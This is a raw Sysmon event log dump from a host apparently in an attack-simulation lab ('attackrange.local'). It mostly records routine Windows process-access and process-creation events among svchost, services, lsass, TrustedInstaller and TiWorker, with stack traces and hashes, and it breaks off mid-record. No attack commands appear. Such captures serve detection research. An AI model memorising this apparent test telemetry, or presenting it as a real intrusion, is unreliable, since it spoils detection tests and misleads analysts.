22:13:19.441{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-ad03-000000001100}3428C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_5f53d2d858cf8961\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5b3d3|C:\Windows\System32\KERNEL32.DLL+1c9af|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+7e06|c:\windows\system32\rpcss.dll+7c09|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 154100x8000000000000000361216Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.443{8e433fbf-36ff-6013-ad03-000000001100}3428C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_5f53d2d858cf8961\TiWorker.exe10.0.18362.1 (WinBuild.160101.0800)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.18362.411_none_5f53d2d858cf8961\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=0ECD172646FE879F84FF33DA8FFA9373,SHA256=C26DC49916EE8298F8A8CBF8ACE62A4538775F8D8D5B33322A316BA7555616B6,IMPHASH=5C119443B09CF04CA999CBD8CA2382AC{8e433fbf-2a44-6013-0e00-000000001100}712C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p 10341000x8000000000000000361215Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.426{8e433fbf-2a44-6013-1100-000000001100}11163904C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-ac03-000000001100}8904C:\Windows\servicing\TrustedInstaller.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|c:\windows\system32\rpcss.dll+32369|c:\windows\system32\rpcss.dll+319fb|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361214Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.426{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-ac03-000000001100}8904C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\rpcss.dll+46b32|c:\windows\system32\rpcss.dll+46af3|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361213Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.394{8e433fbf-2a44-6013-0a00-000000001100}9042540C:\Windows\system32\services.exe{8e433fbf-36ff-6013-ac03-000000001100}8904C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\system32\services.exe+1c74|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361212Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.379{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361211Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.379{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361210Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.379{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361209Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.379{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10225|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361208Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.379{8e433fbf-2a44-6013-0600-000000001100}756876C:\Windows\system32\csrss.exe{8e433fbf-36ff-6013-ac03-000000001100}8904C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\basesrv.DLL+2fba|C:\Windows\SYSTEM32\CSRSRV.dll+5af4|C:\Windows\SYSTEM32\ntdll.dll+6cedf 10341000x8000000000000000361207Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.379{8e433fbf-2a44-6013-0a00-000000001100}9049072C:\Windows\system32\services.exe{8e433fbf-36ff-6013-ac03-000000001100}8904C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+9d934|C:\Windows\System32\KERNELBASE.dll+5f32a|C:\Windows\System32\KERNELBASE.dll+5b3d3|C:\Windows\System32\KERNEL32.DLL+1c9af|C:\Windows\system32\services.exe+b626|C:\Windows\system32\services.exe+e42b|C:\Windows\system32\services.exe+c695|C:\Windows\system32\services.exe+c304|C:\Windows\system32\services.exe+f1e0|C:\Windows\system32\services.exe+e0b6|C:\Windows\system32\services.exe+d98b|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+1364b|C:\Windows\System32\RPCRT4.dll+1451a|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2 154100x8000000000000000361206Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.387{8e433fbf-36ff-6013-ac03-000000001100}8904C:\Windows\servicing\TrustedInstaller.exe10.0.18362.1 (WinBuild.160101.0800)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{8e433fbf-2a44-6013-e703-000000000000}0x3e70SystemMD5=8B5AFFC4987F9AE41DF15940C6EF66CB,SHA256=520273402F22ADA8948F8E1CB0899D0A5B1BC01CFF787747C1227945B336E4C5,IMPHASH=88851E233BD15333933A93A6EDD4788A{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000361205Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.379{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+31ff3|C:\Windows\system32\lsasrv.dll+2fb89|C:\Windows\system32\lsasrv.dll+2e5cf|C:\Windows\system32\lsasrv.dll+2aaa9|C:\Windows\system32\lsasrv.dll+2a418|C:\Windows\system32\lsasrv.dll+149ab|C:\Windows\SYSTEM32\SspiSrv.dll+177c|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361204Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.379{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+10daa|c:\windows\system32\lsm.dll+1008d|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361203Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.379{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a44-6013-0c00-000000001100}980C:\Windows\system32\lsass.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+ff97|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361202Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.379{8e433fbf-2a44-6013-0c00-000000001100}9804888C:\Windows\system32\lsass.exe{8e433fbf-2a44-6013-0a00-000000001100}904C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\system32\lsasrv.dll+29d90|C:\Windows\system32\lsasrv.dll+149ab|C:\Windows\SYSTEM32\SspiSrv.dll+177c|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361201Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.363{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8802-000000001100}2852C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+33fa4|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361200Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.363{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8802-000000001100}2852C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+25e42|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361199Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.348{8e433fbf-2a44-6013-0e00-000000001100}71211220C:\Windows\system32\svchost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\SYSTEM32\bisrv.dll+7f50|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e7f|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e 10341000x8000000000000000361198Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.348{8e433fbf-2a47-6013-6b00-000000001100}55324104C:\Windows\system32\svchost.exe{8e433fbf-337a-6013-7602-000000001100}6288C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+35dc1|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361197Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.348{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+111b6|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361196Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.348{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+106fe|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361195Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.348{8e433fbf-2a45-6013-2700-000000001100}162411036C:\Windows\System32\svchost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1d60|c:\windows\system32\themeservice.dll+1595|c:\windows\system32\themeservice.dll+1461|c:\windows\system32\themeservice.dll+1886|C:\Windows\SYSTEM32\ntdll.dll+2f6d5|C:\Windows\SYSTEM32\ntdll.dll+34634|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361194Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.348{8e433fbf-2a45-6013-2700-000000001100}16242136C:\Windows\System32\svchost.exe{8e433fbf-36ff-6013-a803-000000001100}8680C:\Windows\system32\backgroundTaskHost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+9c584|c:\windows\system32\themeservice.dll+1a9a|c:\windows\system32\themeservice.dll+1736|c:\windows\system32\themeservice.dll+6026|c:\windows\system32\themeservice.dll+ad9a|c:\windows\system32\themeservice.dll+9dcf|C:\Windows\System32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361193Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:19.348{8e433fbf-2a44-6013-1200-000000001100}11647092C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-5000-000000001100}3752C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+6a7b5|c:\windows\system32\lsm.dll+108a0|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+37a5c|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c1eb|C:\Windows\System32\RPCRT4.dll+1a86f|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301|C:\Windows\System32\RPCRT4.dll+18d6e|C:\Windows\System32\RPCRT4.dll+169a5|C:\Windows\SYSTEM32\ntdll.dll+3346d|C:\Windows\SYSTEM32\ntdll.dll+341c2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000361192Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 